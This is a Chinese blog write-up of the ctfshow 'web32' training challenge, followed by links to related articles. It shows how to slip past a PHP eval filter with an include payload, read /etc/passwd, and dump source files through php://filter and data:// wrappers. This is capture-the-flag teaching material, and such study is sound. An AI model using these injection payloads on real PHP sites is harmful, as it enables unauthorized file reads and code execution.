Ctfshow web入门-web32

最新推荐文章于 2024-06-06 15:57:16 发布
最新推荐文章于 2024-06-06 15:57:16 发布
阅读量1.6k 收藏 2
点赞数 3
分类专栏: ctfshow
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45427131/article/details/116764557
版权

Ctfshow web入门-web32 WP

拿到url,首先查看源码
在这里插入图片描述

过滤了以下字符串

flag|system|php|cat|sort|shell|.| |’|`|echo|;|(

过滤了空格可以用${IFS}%0a 代替,分号可以用?>代替
但是过滤了括号之后就不能用带有括号的函数,php中include是可以不带括号的函数,和web31一样,这里需要用文件包含
所以构造的Payload是

payload:http://url/?c=include%0a$_POST[1]?>

然后再POST某个文件名就可以查看文件了,比如下图,我传的参数是 1=/etc/passwd

在这里插入图片描述

有了这一步,接下来就是构造上传的参数1的值

php伪协议通常用于文件包含中,php中文件包含的函数有很多,比如 include include、require、include_once、require_once、highlight_file、show_source、file_get_contents、fopen、file、readfile

include在包含文件的时候会执行,这也是为什么会有远程包含和本地包含漏洞的原因,有了文件包含的函数include,接下来就可以执行php伪协议读取文件了

1的payload:
php://filter/read=convert.base64-encode/resource=想要包含的文件名

这样文件包含出来的回显就是base64加密之后的

在这里插入图片描述

获取到加密的回显之后解码
在这里插入图片描述

除了上面的php为协议,也可以用data协议命令执行

在这里插入图片描述

Payload是

data:text/plain,php代码
chin”
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctfshow-web入门-爆破web25
HkD01L的博客
06-20 780
mt_srand()是伪随机,通过分发种子,如果有种子的话,生成随机数的值也是固定的,生成的值也和php的版本有关,ctfshow,web25,爆破
ctfshow web入门 web14
weixin_59560134的博客
05-11 899
根据题目提示查看源代码,发现编辑器路径 在url中输入/editor得到 点击文件上传发现文件空间可能有内容 /editor/attached/file/var/www/html/nothinghere/fl000g.txt 访问 /fl000g.txt拿到flag ctfshow{8be17f6c-7a13-419b-ada0-f5f1549b3ede} ...
ctfshow-web入门-命令执行(web30-web36)
最新发布
Welcome To Myon'Blog !
06-06 1010
命令执行,需要严格的过滤。
CTFSHOW web入门——web32
m0_74093152的博客
04-23 468
因此可以构造payload:?可以将flag.php文件的内容转变成base64,然后将转换过的flag.php文件赋给a,再将a中的内容显示出来,最后将文件内容进行base64解码即可。过滤了flag、system、php、cat、sort、shell、echo以及一些符号。=是PHP的一个短的开放式标签,是echo()的快捷用法。
CTFshow-命令执行
qq_60905276的博客
07-04 728
CTFshow-命令执行
CTFshow 命令执行 web32 33 34 35 36
ChenD的学习笔记
11-08 890
CTFshow 命令执行 web32 web33 web34 web35 web36
《CTFshow-Web入门》04. Web 31~40
学习学习学习......
12-03 995
eval() 利用与正则绕过,PHP 伪协议、include() 利用。
ctfshow-命令执行-web32
weixin_43400535的博客
10-28 827
ctfshow-web32 题目描述: 原理: 同web29 审计: <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 00:56:31 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_r
ctfshow web223-group盲注无数字
10-21
ctfshow web223-group盲注无数字
ctfshow-VIP题目-Web-详细解题思路
01-27
CTFSHOW-VIP题目-Web-详细解题思路 本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制...
Web32Git:这是web32的示例存储库
03-08
Web32Git 这是web32的示例存储库 测试测试123! 另一个测试!
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
【标题】"CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$" 指的是一项网络安全竞赛中的Web题目,该题目重点在于理解PHP编程语言中的变量循环取值机制。在CTF(Capture The Flag)比赛中,参赛者通常需要解决各种...
ctfshow web189 无单引号,利用回显不同,盲注
10-21
ctfshow web189 无单引号,利用回显不同,盲注
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
ctfshow-web32(命令执行)
m0_62094846的博客
01-21 323
<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 00:56:31 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); if(isset($_GET['c'])...
CTFshow 命令执行 web32
Kradress的博客
10-29 349
源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 00:56:31 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); if(isset($_GET['c']))
ctfshow web入门---文件执行 解题思路
qq_73767109的博客
04-20 840
ctfshow web入门(web29-web59)解题思路与方法
ctfshow web入门 命令执行部分(32-36)
羽的博客
09-05 3280
以下目测均为非预期 32 这个题过滤了空格属实有点难受,php中不用括号的有echo include等 过滤了分号可以用?>绕过。 尝试了以下,发现 include"/etc/passwd"?>可以执行成功。再去想下没有过滤$,我们可以用$_POST[1]呀include"\$_POST[1]"?>然后post传参1=/etc/passwd执行成功。还有一个问题include包含php文件不会在页面显示出来,灵机一动,伪协议呀!完美 33 payload ?c=include$_POST
esp32 post请求
08-26
ESP32中的POST请求可以通过引入urequests模块并使用该模块中的post函数来实现。首先,需要导入urequests模块,以获取执行HTTP POST请求所需的函数。通过import urequests来引入该模块。然后,使用post函数来发送POST请求并传递相应的参数。具体的代码实现可以参考乐鑫ESP32的HTTP POST请求源码修改。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [ESP8266之HTTP请求](https://download.csdn.net/download/weixin_38638002/14031809)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [乐鑫ESP32 https post请求](https://blog.csdn.net/weixin_44244400/article/details/115551627)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [ESP32 MicroPython:HTTP POST请求与HTTP GET请求](https://blog.csdn.net/zhazhawoaini/article/details/107007818)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值